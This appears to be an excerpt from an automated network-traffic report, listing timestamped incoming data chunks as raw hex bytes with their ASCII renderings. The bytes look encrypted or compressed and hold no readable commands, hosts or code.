2022-11-03 06:22:07 UTC	156	IN	Data Raw: 88 5b 42 0a 9e 1b d5 34 50 c4 a9 c8 76 7b 57 b6 5c 66 7d 5f 74 c8 03 bb 9a 33 80 aa af 67 7d 63 3f cd dd b7 41 fc 9a bd 6d 90 0c ca 75 d8 e7 7c 31 fa e4 eb d4 cb 6b 9f cc 52 15 77 99 11 81 15 d7 af fb 4e 60 f6 30 54 10 fa 14 62 2e 8c cc 0e 83 ec b3 28 83 5d 08 d1 07 b3 9f eb 7c 16 69 4f db 00 d9 b3 08 e3 71 31 0f e3 11 8a b1 3e 5c 38 66 b3 88 7e d9 85 6f ab fc d1 e0 15 e4 a9 8c 05 1b 40 13 0f 8c ab 63 07 28 2f 17 38 e8 c7 01 93 5e f0 3e 4d 87 f6 85 52 1c d2 f5 95 f2 98 23 05 54 c7 0d d0 9c c9 29 54 25 a6 ab 3f 6e 98 41 2f ba e6 33 e9 69 f7 6f 42 15 ae 7f c9 85 8b 72 95 36 3e 1c be 2d ee 28 63 b5 b9 50 af 66 90 88 c1 5c 8b 22 6a 21 83 a6 21 11 c9 f7 35 8e 62 3f 7a ef 94 79 68 d7 30 f6 a6 a8 f3 ae bb 06 92 64 5d a2 48 2b d5 78 ae 2e 10 72 97 81 a4 0d 69 8c Data Ascii: [B4Pv{W\f}_t3g}c?Amu\|1kRwN`0Tb.(]\|iOq1>\8f~o@c(/8^>MR#T)T%?nA/3ioBr6>-(cPf\"j!!5b?zyh0d]H+x.ri
2022-11-03 06:22:07 UTC	158	IN	Data Raw: cc c3 bc 18 1b 05 73 c4 bf e3 fa 52 c4 58 87 51 28 b7 1a aa 36 8f cd 3d b6 ae 16 f5 9b 40 3b eb c4 30 a0 4f 93 c2 9f fe 70 ec 34 7c 46 43 d9 01 25 63 c6 75 0e 58 bc 76 c5 8d f5 47 f9 b0 c3 cf 2f 08 87 a9 97 54 1f a8 ef 24 17 a3 93 83 05 71 25 1c c3 5e 7b 79 c4 9e b8 50 25 dc d1 d8 5a 4e 14 ab f6 e3 a6 89 82 6e 2e fe 58 02 53 52 df eb f1 f5 7f 74 f9 03 20 da 3d a0 d6 72 01 5a 30 30 9d e6 6b 59 99 0e da 99 12 17 8f c4 5f 91 02 89 6a 37 1a 71 d0 99 7c be 77 03 fc 4b 6b a1 b6 c0 58 f2 d0 e4 83 d3 fc ff 38 21 a6 df b8 d8 d7 1a 05 6b f7 f9 fc b9 0d 23 47 44 07 c4 9d 57 80 c5 b6 aa 19 0d c3 48 0e 69 b5 bd 91 ef 31 52 10 f9 a0 e0 15 aa 41 99 7d 08 52 0c a9 0a 27 dd 8b 5c 80 49 ec a5 98 ed 9a 73 92 0f 43 17 cc 1b 59 8a 59 0d cb eb 5e e8 06 a9 a9 90 2c dc 4c 46 91 Data Ascii: sRXQ(6=@;0Op4\|FC%cuXvG/T$q%^{yP%ZNn.XSRt =rZ00kY_j7q\|wKkX8!k#GDWHi1RA}R'\IsCYY^,LF
2022-11-03 06:22:07 UTC	159	IN	Data Raw: 76 d2 e6 fe 38 69 cd 6c 88 19 9b 49 dc 38 9c 16 d1 28 57 ed e1 9d 02 01 4b c4 60 b6 03 3c 30 39 24 58 d7 d1 00 c9 8d e6 d1 23 f6 90 37 86 d7 cb 7e 75 c7 af c6 70 8c 1c 1c 95 be cb b0 ab 40 1e 5c 61 e8 bc 48 2b fc 0c 39 4a 09 b3 69 a0 7f 7e e1 8c 14 3d 0c 16 f2 b4 6f a8 60 ab 77 03 68 8e 7b 37 49 1a 84 0c 3c 85 60 83 34 cc 46 f2 cf e2 fb 2c 32 09 30 ee 95 76 d0 86 82 8c 38 d7 38 81 49 62 90 d6 eb d7 4e bb e2 08 ea cf f5 30 bb 03 9a 92 b7 81 de 89 1b 22 48 da 10 d5 93 71 91 42 63 00 8d 47 04 63 bf f2 ba f0 df d2 e0 55 4f 11 0b d8 e9 17 8e 8d 44 80 21 22 56 99 33 57 f3 d1 b5 26 fa 88 ce 02 54 e8 5c 57 a1 2b 26 5d 4b 75 1a 22 eb aa db b7 54 e6 68 fd 12 22 5d a4 58 db f0 c6 dd 53 30 19 fe 6f 1d ae d2 f0 47 33 7f 92 67 65 bb 85 30 42 6e 0d 6b 13 22 73 47 20 89 Data Ascii: v8ilI8(WK`<09$X#7~up@\aH+9Ji~=o`wh{7I<`4F,20v88IbN0"HqBcGcUOD!"V3W&T\W+&]Ku"Th"]XS0oG3ge0Bnk"sG
2022-11-03 06:22:07 UTC	160	IN	Data Raw: f5 34 8c 27 3a fc 4d 2c ba 4f 90 08 09 00 fc f8 2c ed 11 7d f8 96 d3 e9 16 ee ac c8 ff 94 6f e8 59 a6 af 89 4f ed 07 61 6a cf 6c c4 35 4f 99 76 c7 94 41 90 01 02 dd ff c9 21 0f 8d 22 70 5a 95 f6 38 38 4c dd 63 ad e1 a6 d5 24 b9 38 9e 55 07 21 3f b2 ea d6 09 15 88 0e 14 f4 cc 30 16 f2 60 aa 54 ac 8b 80 58 da 86 e1 a2 09 84 eb a8 03 46 6e 94 b5 97 8b 79 5f f0 e6 be 85 61 b2 c6 5d 87 e6 e4 4d 1b 39 9b 1f cd 8a 3a e8 9a 17 17 14 55 f5 f5 66 55 7e 71 b2 ac 30 17 b0 8a 4d 85 a7 c7 42 0f b6 8d d7 cc 40 19 20 9d 67 c4 f6 69 f3 5f af f4 59 26 f2 07 4f 32 23 10 2e 6c 9d e1 83 16 58 07 84 2f 5a c4 2d c3 2f f3 d4 d9 c9 f8 f9 60 f3 cb fe ab 33 4d e9 1e 14 5d 5f dd 3c 67 a6 2e 3f 87 73 c8 c3 5e 02 a6 6a c8 fe 40 a8 3a 4d 43 a9 6e 2c d5 4e 5e 5c 0f e3 92 60 05 5d f7 d6 Data Ascii: 4':M,O,}oYOajl5OvA!"pZ88Lc$8U!?0`TXFny_a]M9:UfU~q0MB@ gi_Y&O2#.lX/Z-/`3M]_<g.?s^j@:MCn,N^\`]
2022-11-03 06:22:07 UTC	161	IN	Data Raw: b8 31 d4 4b 97 78 f3 cf 5e fc 2e 22 db 14 92 82 9a 97 31 34 ad 17 e0 08 b5 8d 04 55 b0 c1 cc 76 e5 0d 72 c5 c8 c9 5d 1b 9a 38 58 50 12 f5 d6 4b ce a8 8b 3d 72 da 2a 34 bc 51 b0 2d 71 72 30 98 63 96 28 95 37 c5 92 0f 5f 8b 36 7d bb 06 fd 50 75 39 12 d3 b2 ae 83 e9 12 56 4e 35 42 29 68 f6 e0 ea e4 d6 50 17 7b 81 6c cd 17 f9 Data Ascii: 1Kx^."14Uvr]8XPK=r*4Q-qr0c(7_6}Pu9VN5B)hP{l
2022-11-03 06:22:07 UTC	161	IN	Data Raw: ce 3a 5d 9d 1e 0d b1 dc d4 89 b8 f1 ce 4c f3 cb 3e c0 2d 85 a6 9c 8a 8c 7d 9d e5 77 60 19 62 22 39 0c 9f 5f 07 f3 f6 72 49 e8 0f b2 57 66 9f 26 e4 9f 61 1e ea ad 22 80 eb 63 b1 13 e0 68 26 f6 12 85 7d 0f 54 5f d8 9e 58 58 f7 39 66 a7 1e 58 5b 74 a8 58 dd 8c 29 bc dc 94 93 83 2d 90 8d 8e 07 13 5d c8 62 3d 8b c4 bb b8 d9 80 0a 36 56 89 4e 4e ff 7e d8 2e 7f 6b 98 25 ac 12 71 d9 77 14 60 c0 a0 82 7b 66 71 fd 58 92 bc 10 35 43 0a 4e ca 12 1f 95 e2 ff cd 99 72 e3 36 22 de 7f f2 1b 5e d9 ca e8 99 fe 6a ec ef d9 f3 ed 4f 2d f9 ed 3e 40 6b a8 fd aa af 98 fb 8c 07 e2 0e b4 24 07 14 80 26 09 2b 93 4e 81 7e a5 48 e9 ee ad 3f 6e 99 ad e6 63 0c 7e fc a5 c4 69 b2 95 9c e2 aa 3b 9f 6a 7d 31 93 b2 32 fc 01 a8 b1 92 4c 73 cb 96 5d 61 d0 5a 61 e0 b0 09 52 16 18 95 5a 79 5a Data Ascii: :]L>-}w`b"9_rIWf&a"ch&}T_XX9fX[tX)-]b=6VNN~.k%qw`{fqX5CNr6"^jO->@k$&+N~H?nc~i;j}12Ls]aZaRZyZ
2022-11-03 06:22:07 UTC	163	IN	Data Raw: 75 ae d7 bc 53 9b 46 73 81 8b b7 78 dc 4f b9 c6 74 6a e9 88 f5 29 aa 3b cf c0 06 75 c8 06 fa c7 44 a5 ba bd 1b 16 2a 9f be 11 5d 40 e1 ef 3f 4d ab 5f b7 8e 50 fb 4d 4a 61 c9 2e 9f 31 46 52 79 3c 51 19 58 52 5e dc 44 5e 58 84 42 db a3 ab d6 29 79 5e d0 30 30 80 d7 aa 15 49 99 2f e7 59 35 bf 38 8c 10 9a ab aa 5f bc 53 d5 b4 43 0a c5 8a aa 0b 72 7c df 8d 00 04 09 f6 1a 46 2a 55 8f 15 01 c9 b7 74 c4 a0 1f b6 87 c5 e6 e7 84 a9 d5 e0 a4 93 5a 1c d1 14 86 1a ff bf 71 ea 5a 68 5b 97 09 5f c6 37 66 00 e8 b9 01 b6 82 f7 c0 3f 5c 66 27 2b bd 15 18 b4 54 d7 71 fc 32 6e b8 12 ad ff 73 17 08 b1 ec 8b c2 e6 54 51 5d 62 11 c7 3c d7 bd 5f ed ba 29 ce 4b e8 f2 da f5 90 39 17 2d 9c 25 b2 9e 99 ec 8a c0 4a f5 b4 5a 6a db af 61 7b a9 20 26 c1 14 8e 14 19 96 ca c8 5a 5c bd e1 Data Ascii: uSFsxOtj);uD]@?M_PMJa.1FRy<QXR^D^XB)y^00I/Y58_SCr\|FUtZqZh[_7f?\f'+Tq2nsTQ]b<_)K9-%JZja{ &Z\
2022-11-03 06:22:07 UTC	164	IN	Data Raw: 83 8e 33 73 d2 e2 67 3f 1c e9 f8 cf 4f 38 d3 93 fc 9a 5b ee 8f e5 8e 53 6f 28 56 eb 7b 43 72 f5 bc ae ea 23 02 e1 6a 7c 4a e7 1d c1 52 4b 73 ba 54 98 2b a5 24 5c c5 74 6e ee ef da aa 77 d3 4a 2d 45 a1 42 6d 08 48 2d c8 a8 b5 fc f4 ca 3b 83 cf 59 58 e8 4a ff cf c4 55 e0 b0 a9 e6 88 5c 78 86 24 45 79 c6 1d 16 d1 0e 53 df c6 cb d7 7e 80 99 d6 9f a6 31 0e 5f 13 69 0c e8 8d 72 c9 0d c1 9a 75 57 d1 6e cb 1c 71 69 10 96 80 d0 76 f6 94 35 ad d9 93 3c ab 7e 8d 6c 0b 6e f6 84 2d b7 09 2b b1 a1 14 2e 97 a6 17 53 63 9b d1 b9 73 a1 9e 0e 13 f2 e9 88 c3 ec a5 43 f4 e2 a8 96 96 fe b5 62 a5 fa fe af 26 a4 77 9b 7b 4e 12 68 aa 2b f1 ab d8 38 99 07 41 3b 39 a5 bc db 73 d0 03 5d 21 75 a0 79 de f2 77 34 8c a8 99 4e ba b3 b2 c2 6a 70 8d e8 9d 7b aa 67 9d d4 dc b6 91 7a ed df Data Ascii: 3sg?O8[So(V{Cr#j\|JRKsT+$\tnwJ-EBmH-;YXJU\x$EyS~1_iruWnqiv5<~ln-+.ScsCb&w{Nh+8A;9s]!uyw4Njp{gz
2022-11-03 06:22:07 UTC	165	IN	Data Raw: 4e dc 21 c5 f2 f2 79 a5 51 a1 b6 c4 7a 8e 48 a2 a9 95 31 8d b7 b8 2a ef a8 66 76 22 d6 b8 b0 14 53 3d 37 dd 48 cb 22 b2 38 37 96 bb 24 a2 0d e5 14 17 6e 3d 6e 58 01 0b 0c aa 4c b5 9e a5 f4 06 c1 3b 2e 43 47 c7 26 bf b9 d7 90 0f 60 fa b0 d1 74 59 58 e4 e1 91 63 12 bf b5 29 d5 6a ea 5b 67 fe be 21 b3 4a 16 4a 5e fb ae 2e 49 6c a5 e5 cb 43 00 89 5e 4e 43 22 ec 8f 58 85 be 50 dd 8b 86 c6 f4 03 88 a9 56 19 e1 0b 3d bc 34 0b ff 9b 84 0d aa aa e4 e4 70 22 ee 4b a0 8e 80 90 a3 8c 47 bc 25 cb a4 44 5b dc 70 cb b9 b2 fe 46 a8 ea 06 25 00 84 5a 61 e7 44 28 f1 f6 8e 51 02 43 db b2 c0 a7 d7 5b b0 3b 75 3d c4 e4 6f 39 5d ca fc 52 a0 62 d3 c5 6d 6b 6e c9 c8 1c 80 96 ee 03 af 76 e8 de d4 a7 64 01 aa a8 c9 73 00 51 11 ca 3f ee 76 97 a0 b0 68 ed 1d c5 cf b1 dd 82 73 c5 6c Data Ascii: N!yQzH1*fv"S=7H"87$n=nXL;.CG&`tYXc)j[g!JJ^.IlC^NC"XPV=4p"KG%D[pF%ZaD(QC[;u=o9]RbmknvdsQ?vhsl
2022-11-03 06:22:07 UTC	166	IN	Data Raw: 76 eb c9 bf 81 29 89 d0 ed 27 3c d9 cd 7a 7e bf e1 a9 20 90 62 6b 2b ce f5 05 e8 07 3a a3 6a 80 cc ef 7d 16 58 da e3 cd 91 05 2e d3 fd 1c 5d b1 55 1e 07 40 8b be 23 a1 b3 2f 66 d5 6d dc bf 5a 7a 2e 15 3d e1 2a 29 da da 93 1d db dc de e8 4a 24 e8 d5 cb 74 41 5a 9c 87 2a 25 02 4f e0 7d 81 d6 b7 92 93 f2 aa 60 7e 30 2a 1e de b4 12 e9 a0 d7 02 48 ab 4f b6 10 22 10 36 fb 2d 36 6c 43 8d fc e8 b0 71 37 9f c8 58 7b ab cd ef be 55 f5 1e 3b 49 de c7 8d fc ed 04 0a 0d 4a d4 67 b0 d4 de 4a 6e 06 3e d7 8a 11 4b 7e e6 dd 15 7b 2c 45 6f 88 38 3b 37 c5 ba a6 e6 06 30 51 23 0d c7 e2 91 5d 59 67 35 68 0c 44 1d 8b 79 ae bf b9 56 51 2e d0 7c cd da b7 27 ab a0 ee c4 4d 6e 6d 18 0f 75 e3 d2 07 ae d5 c3 61 e3 d9 2d 6b e0 44 11 21 80 c5 c4 f7 bc 1c 4e a2 d0 82 09 6c 22 d2 95 cf Data Ascii: v)'<z~ bk+:j}X.]U@#/fmZz.=)J$tAZ%O}`~0*HO"6-6lCq7X{U;IJgJn>K~{,Eo8;70Q#]Yg5hDyVQ.\|'Mnmua-kD!Nl"
2022-11-03 06:22:07 UTC	168	IN	Data Raw: 6a 02 d9 b0 b1 86 ca 4e 8e d2 75 c7 cd 52 95 64 5a 8a c3 12 b0 9a be c1 b0 ae cc 7f ca 47 77 ca 26 c7 73 e1 92 ab bd 8e a8 94 dd 0e 76 f5 82 0d af cb ae b3 0d 1c 67 b6 c7 88 75 1a d7 1b 7d 17 04 e4 39 c0 40 c8 32 3c 39 eb 9f 48 fa 1b 71 6f f7 cd e7 ee f6 f3 bc f1 7b f5 56 cd 66 5e 16 e7 2a 9b f9 86 79 d2 40 20 cf f7 10 2b 7a ba ef 8f 26 84 bf b8 1a fe b1 c8 77 ed 56 40 6a 10 db 85 79 6b d6 0b d9 96 14 c0 f6 c1 73 b8 0e fc dd 8d 7c 95 f3 ed 66 2a 47 7b ca 33 f9 1b 1b 22 4b 25 89 ea 00 a4 ba 81 85 49 b7 e4 c4 e7 58 b8 3c 46 29 f6 90 05 e1 79 2e 9e 21 b2 0d 26 e0 33 bb e6 73 75 e3 ec db c1 b3 1d 51 cb f4 a5 e6 0b 75 44 97 9c 43 18 e0 7d da a3 31 41 52 e3 94 27 41 16 c5 13 b5 7c e9 6e ed 6f 6b 24 27 64 aa 01 81 85 97 f0 87 1b 35 9d 04 5e 69 b9 2f f0 f3 c3 03 Data Ascii: jNuRdZGw&svgu}9@2<9Hqo{Vf^y@ +z&wV@jyks\|fG{3"K%IX<F)y.!&3suQuDC}1AR'A\|nok$'d5^i/
2022-11-03 06:22:07 UTC	169	IN	Data Raw: 59 5b 84 d0 c5 0a 46 1b 59 1a 4d af dc 2c 2c 8d 00 14 32 49 7e 5d 2c df 0e 84 8c 1a 9c 5f d4 bb ac bb ed ae 40 4b 4f fa 55 d1 d0 cf 9f 9c 81 6f 94 24 01 4b 3e e0 b4 81 bd e2 19 7e 3a d5 9d 23 29 c2 f4 22 b4 af fb 17 d8 25 66 8b 90 c0 71 09 41 51 39 69 6e 10 e0 e1 30 50 61 0b fc 8c 73 d1 fa e7 3e 6b 1a c9 f8 76 03 4e 39 34 98 9c db b8 99 10 8f 76 5d 5c c7 48 3d 4e f7 70 54 15 c6 50 2d 7a 34 ea 13 07 ce 2f 97 fe 94 4b 52 b6 ad 2b ef ff 2a 01 71 dc 4b 09 75 43 d6 ad b8 30 91 c4 24 b7 24 c0 8b 5c d0 52 b7 bb fd 67 e5 b5 38 de 9d 15 c5 d0 d3 4a 47 a8 de 63 41 b8 b0 6e c4 63 f1 6c 99 1a 36 65 98 a0 46 b7 20 82 8e 8c 22 30 ef 56 86 e9 89 fc 7f c9 9f 0b 19 aa d9 c0 20 3e b6 fb 32 41 76 e3 57 a7 95 7b be 75 ff b9 40 27 fd a9 39 16 5b 8b 3f bb 72 55 58 2c 4c c3 3f Data Ascii: Y[FYM,,2I~],_@KOUo$K>~:#)"%fqAQ9in0Pas>kvN94v]\H=NpTP-z4/KR+*qKuC0$$\Rg8JGcAncl6eF "0V >2AvW{u@'9[?rUX,L?
2022-11-03 06:22:07 UTC	170	IN	Data Raw: 61 89 e3 b6 27 da 0d 45 70 40 1b 51 73 94 c4 99 ab e5 87 1d 07 30 9e b9 c5 72 4d f7 c9 7c 9a 27 ac 9d 81 04 8e 52 be bd e3 0c 6c 0a 2d 9b a5 9d e5 18 0e b9 22 76 60 b6 54 70 c7 41 d1 fa d8 28 6e bc f9 21 e3 85 83 5d 14 c4 c3 f8 10 8f 52 48 f6 9c 09 28 7b 45 e4 80 97 32 96 2f f6 65 3b a5 f2 d8 6a 34 10 62 bc fb 6f 46 09 29 b5 be 51 5f 61 30 5a 48 90 41 b5 79 99 fc 01 d2 29 bd 54 c7 16 53 a2 d9 9d ce b9 a1 7a ef 7a 07 58 10 5c 54 ab bf 17 05 d0 ed ba 05 68 14 5e c9 2b 78 05 5b 2f 98 80 69 6c 9e d2 9b 2d 89 2e 96 ea 83 ba a8 fc d0 02 19 57 de 09 5e 7c 18 36 96 78 04 45 f3 b1 31 4e 9b 71 f6 45 96 b4 16 4e 1a c9 ce 5b 69 ac 7a fb 82 9b 97 8b da a3 ea 29 43 fb 47 6f 97 f0 92 39 44 d0 07 d3 0e c7 94 eb e4 1e 1b 2b 27 02 da f9 39 26 f2 ab cb fa 75 96 ff f0 38 05 Data Ascii: a'Ep@Qs0rM\|'Rl-"v`TpA(n!]RH({E2/e;j4boF)Q_a0ZHAy)TSzzX\Th^+x[/il-.W^\|6xE1NqEN[iz)CGo9D+'9&u8
2022-11-03 06:22:07 UTC	171	IN	Data Raw: 08 36 bd 34 4d 1f 74 eb 28 ab a3 b6 43 c3 88 0e cf d7 80 4a 4f 92 f1 ae 48 52 fb f9 2c d4 02 96 10 0d 5c 75 79 94 ad a7 06 cf 84 97 7f 8f 88 21 2b d9 d5 89 1a 5c b0 0e f2 9f 58 d4 22 3d 3e bf 78 7f 53 ae b6 95 cd be 4d 5d c4 84 14 2e fd 8d ac 0c 27 d4 88 9b 55 0e 35 30 3b 4f 23 15 9c ed 39 8b 0d 61 e7 01 e1 4b 9d 8f 39 47 3d 0b 3e 85 de e1 12 fb cf 41 83 13 36 bd 67 7b 74 7c 63 6c 4f 44 4f 1a cf 1a b9 9e 5f f1 cd 26 81 fe f8 c5 34 d6 7f e6 30 9e 9f ad 85 5d c1 90 4d 17 bc 71 31 df 4f 03 4d 7f 33 02 67 f5 85 ba 5a 5b 9b 86 fa 29 78 ab 7a bd 57 73 39 d9 c9 26 75 a8 21 80 a9 29 2f 11 64 d7 d0 7c 17 2d 71 d0 07 72 33 ba e9 e5 4c 90 9d e4 88 d9 4a de 15 a9 54 a3 9d 47 55 02 27 bc df 0c 28 b0 69 fb a9 7e 06 1d 4d 31 00 c6 4f 23 75 6e 19 39 20 01 63 98 6e 90 38 Data Ascii: 64Mt(CJOHR,\uy!+\X"=>xSM].'U50;O#9aK9G=>A6g{t\|clODO_&40]Mq1OM3gZ[)xzWs9&u!)/d\|-qr3LJTGU'(i~M1O#un9 cn8
2022-11-03 06:22:07 UTC	172	IN	Data Raw: 7f 9b af e2 16 49 a4 b8 32 48 68 90 92 58 e9 d6 8f dd 7d 1e 8a 95 be d3 f7 a1 64 a5 26 41 4f a7 32 48 00 4b dc db ad 68 39 6c a6 9e 62 c6 41 51 af 20 97 a6 52 12 f3 cd 9f b1 b2 ba e0 e5 ca 08 16 d8 2a 5e 23 6f c6 3e 6e 5a c1 76 cf 78 62 a0 57 de f0 d4 a2 f2 a8 fd 2a 40 df f0 b4 00 0f f6 1a fd 00 39 b8 c5 8d 1c e8 3f 30 1a e8 ef 33 75 8a 5a 05 10 e3 ee 52 31 a4 5c b8 3a c4 76 1c ad c1 9b c1 0f ff b2 44 c3 1b f7 63 a8 52 9e b4 88 4b 21 09 8b 6b 22 44 75 59 6c ac e1 dd be fc 7a 1c 8e 1f 44 c7 b4 7b d4 f4 c7 df 00 a6 c6 99 d6 da aa d0 6a 43 a1 a6 5d 4e 62 33 61 ae 7e 25 20 8f 98 7f 0f ca ed a8 92 cb e8 07 fa 0c ad d9 d7 16 1b f3 2c 61 58 0e 95 53 25 d7 1b 26 7f 20 34 a5 07 f4 e2 e5 16 3a 7d 8b a8 7e 2d 74 a9 cf aa e1 d6 06 c9 89 f9 3b 1a e5 c4 eb 83 af fb c9 Data Ascii: I2HhX}d&AO2HKh9lbAQ R^#o>nZvxbW@9?03uZR1\:vDcRK!k"DuYlzD{jC]Nb3a~% ,aXS%& 4:}~-t;
2022-11-03 06:22:07 UTC	174	IN	Data Raw: 5f ef b0 a3 91 f3 6e 12 6d 86 d6 d8 cd 96 4e fb 7d e0 1a f9 9a ab 1a a4 cc 18 3a 5f 47 b3 2c e9 6e 26 19 87 55 f6 36 87 ca 08 30 54 1b 3e e3 18 9b bc 51 8b e9 ad 09 b8 f0 3c 3b 44 58 7e 50 e0 91 20 8b b0 80 9e 50 e4 5a 12 e0 30 3a aa 1c 81 9b 23 20 7d 1e e8 dc fb b4 1f 12 d0 56 e7 e1 27 5d 82 f0 97 f1 ab e9 81 24 8c 9e 61 13 6f 80 58 55 3a f9 64 0b c9 31 0c b4 da 4d 56 8e 28 eb 6d 2b a4 82 60 40 7b 29 dc 88 5b 50 93 26 2b da e5 bb 5d 4e 0d b3 6f 16 e4 17 98 75 ea 1a c7 ff 0f b1 00 58 2d b1 12 d3 84 21 96 3d 3b f5 f5 83 45 e8 df 0e 4e 4a 71 4e 8b 4b 45 0a 00 d9 0d cd 9c ae de 76 98 95 29 1f 0f 14 9b e7 4d 19 76 61 01 0a 16 05 f1 80 4a 75 96 a0 02 4f 10 8e bc 39 a7 aa a0 26 ce 2c 0a 46 49 f0 77 6b a7 11 4f bd 5c a4 bf 57 89 4f 9d e7 4e 2d 50 a2 a6 42 65 e3 Data Ascii: _nmN}:_G,n&U60T>Q<;DX~P PZ0:# }V']$aoXU:d1MV(m+`@{)[P&+]NouX-!=;ENJqNKEv)MvaJuO9&,FIwkO\WON-PBe
2022-11-03 06:22:07 UTC	175	IN	Data Raw: 78 9e a7 95 bc a6 f3 04 5f 6b a2 aa 1c bc d1 c6 6c d6 2e 0e 0f d4 b9 09 42 e2 cc 85 bf c6 6b c1 d9 7d 7c b0 5c 47 4e 6e 4e 68 37 9d fc 3f c1 84 5b a2 65 4e ca f6 98 58 61 43 60 27 64 3f d0 8c 30 10 3e a0 a4 ca f3 b0 83 ac c2 e4 07 dd cb 3f 8b ab d9 02 23 e0 6a 96 51 16 c9 7c d6 be ec 7c ec 87 d2 d3 71 21 b4 60 2c 49 f4 62 ee c7 b5 58 09 0c 50 95 8e 57 e9 bc b3 31 16 4d 5d 1c 43 a4 60 5e 26 2a 1f d6 df 40 ee d5 0f b0 05 45 3b 78 08 8b f3 df dd 0f 19 d3 02 da a5 54 79 3f 56 a2 9f 59 7f 97 2a bf da bd e1 30 58 8a 6d 03 c5 7b 5d 5f dd 5e 24 0b 2f a6 f8 25 4a 38 4e 87 99 9e 9a e5 2b bf 4f 23 55 52 aa ac 46 2f de 86 2f 36 f4 dd fa 58 d3 ce 79 ad 75 7e 63 1c d4 99 ea ee 1b c2 28 60 42 19 de 89 80 7e fa 1b ba 7b bf 77 22 0f fe 0b d2 d6 61 63 a5 c2 3d e5 b4 84 b5 Data Ascii: x_kl.Bk}\|\GNnNh7?[eNXaC`'d?0>?#jQ\|\|q!`,IbXPW1M]C`^&@E;xTy?VY0Xm{]_^$/%J8N+O#URF//6Xyu~c(`B~{w"ac=
2022-11-03 06:22:07 UTC	176	IN	Data Raw: 9a 6a 2f d6 2b a4 46 39 94 95 d5 60 b8 79 54 39 69 71 88 78 96 1f 66 22 e3 bb 80 56 0c 20 ac bb 26 78 d7 09 35 fe 19 29 fc 76 f1 21 78 4a 3f 43 a4 22 14 05 cc c5 e9 52 a4 97 69 87 63 6c 88 26 cf 47 6e f8 66 19 10 8b 52 d2 4f 02 d4 c8 90 93 9c f1 aa 9b 74 dc de f4 22 2a 34 83 1b ac 0b f2 64 08 25 73 28 69 e6 63 a9 31 27 d3 4d 3d 7d 74 fc 73 45 70 c8 8b a9 49 48 61 45 b6 5a da 53 3d da 13 77 00 c6 bb 43 bf 51 85 3a f7 5a 4c 43 69 4e 38 70 be 63 1b b3 8f 49 55 7e 7f b8 1d b8 41 96 90 fc 00 5f ad 55 70 7a ef 6b e2 7e 73 60 f7 32 dd 21 97 85 26 3e 20 6b 8a 62 f0 d7 70 ce 8e 15 23 3e 69 2a 38 9a d8 66 45 38 fa b2 6c 20 f6 37 a3 ff dc ca 97 f8 95 4c 52 0f 07 40 76 df bf f9 24 15 e9 ac 22 8b c6 6d cd 2f 37 85 c3 13 2c c8 e9 e6 77 98 f7 00 c9 d8 36 87 80 1d 8d 5f Data Ascii: j/+F9`yT9iqxf"V &x5)v!xJ?C"Ricl&GnfROt"4d%s(ic1'M=}tsEpIHaEZS=wCQ:ZLCiN8pcIU~A_Upzk~s`2!&> kbp#>i8fE8l 7LR@v$"m/7,w6_
2022-11-03 06:22:07 UTC	177	IN	Data Raw: 24 be a2 c7 1b 10 cc 48 ea 15 41 3e 76 f2 4f 35 0a 96 e0 f0 79 bc c8 8a 82 0d 14 33 e3 e0 64 a8 aa 6b 4f 22 1e 37 dc 0c c9 66 cb fd 95 6a 1c c8 15 f6 2c 17 ad 9b 8e 54 e9 31 c2 d3 d7 c8 d6 4b ea 22 bb a0 f8 25 cc 4d 73 a7 57 e3 ed df f8 e6 ef 31 34 c9 6f f9 ba 19 b7 1c d2 13 1e 60 ea 88 45 ea 18 51 03 f8 5f 3d 4d ea af 59 Data Ascii: $HA>vO5y3dkO"7fj,T1K"%MsW14o`EQ_=MY
2022-11-03 06:22:07 UTC	177	IN	Data Raw: d3 ab 3c 9a ce ba 96 58 c5 ee c5 f2 18 3c 0a 68 00 4f e0 1b d8 4d 58 ce 5b e8 b1 8d bd ce 7c a6 39 98 e1 25 8a c6 e9 10 f7 ec c4 0b 24 b7 6b 50 6a 84 4d c0 ad a0 aa 1f b5 8d 52 fc 42 30 b6 b4 f7 cd f5 67 43 9b 47 13 0a 08 a1 77 6c 3f a8 97 bd 6e a8 ce 0d 5d 6b 23 c8 ae 3b d5 43 e8 1a 75 0a c5 f8 8c 8a f4 3a 8e 0a ed f4 c3 c0 fa 30 e4 ce 5e e4 6d ee 5d f8 52 41 a2 d2 a0 dd 19 19 1e f3 19 85 c6 12 9e 56 47 01 c0 d4 33 d3 cf 07 57 4a 26 5c 53 c4 95 8f 28 5a cd c0 6e 06 8f ba 68 d3 53 f7 22 60 62 c9 7a f1 a4 1d 26 2e fc 0a b7 86 7c 03 95 ca 69 e5 f8 d5 15 fb 60 47 ec b9 da d8 0a e8 e4 95 3f 6a ef b2 95 8b ad 30 c8 6f 36 00 3d 53 48 25 a3 96 a6 4c f5 6f 40 ff 16 26 3a 90 0e b3 6c 7c 48 20 19 db 75 4c 0b ea 4a 55 28 44 94 32 f3 49 6a c8 54 b5 64 60 fe f4 88 41 Data Ascii: <X<hOMX[\|9%$kPjMRB0gCGwl?n]k#;Cu:0^m]RAVG3WJ&\S(ZnhS"`bz&.\|i`G?j0o6=SH%Lo@&:l\|H uLJU(D2IjTd`A
2022-11-03 06:22:07 UTC	179	IN	Data Raw: 08 a7 d7 47 bc ab 8d 6d f5 d8 7d 53 05 91 16 9f 04 d7 74 ac 85 fa 79 e9 40 9b 66 13 3b 58 6b 14 0c 22 96 71 dc db 2d 7b d9 c7 c8 13 4c 3b 09 b5 4d 85 f1 98 c6 11 67 7e 7c ab a7 4d e7 77 04 2a fb 34 a9 e2 36 85 04 77 57 0b 38 49 a6 3f d5 85 57 b4 e1 30 a7 57 8c c1 8a 39 42 72 a1 a4 ab 0e 74 7a 3e 8c b0 b8 2a b2 bf cd e4 de b2 7c 32 36 da 1b ee b2 df 97 ed d1 b4 10 3a ac b1 86 61 d0 91 67 17 b2 12 ec c8 f1 83 6b 60 dd f0 cd 0b 51 55 4b 76 6f 3d 5d 88 64 c4 98 96 f2 fa 05 a3 41 64 22 fb fc 5f 04 23 64 a5 c3 10 ab 93 cf e4 47 ed 15 db 1a 4f c6 93 1c 17 ec 6a 3c 05 09 07 5e 71 eb 49 9d bf 0a 1d f3 0d 9f 62 0a 68 d8 49 f5 b4 11 e4 ab ea 70 43 b6 81 ce 8d da b5 d8 96 4f 50 5a 56 73 1f 5a 34 22 cd ba a6 cd 3a 7f 19 d3 7b 65 01 fe 20 1a 6f a2 f7 16 65 16 f3 98 19 Data Ascii: 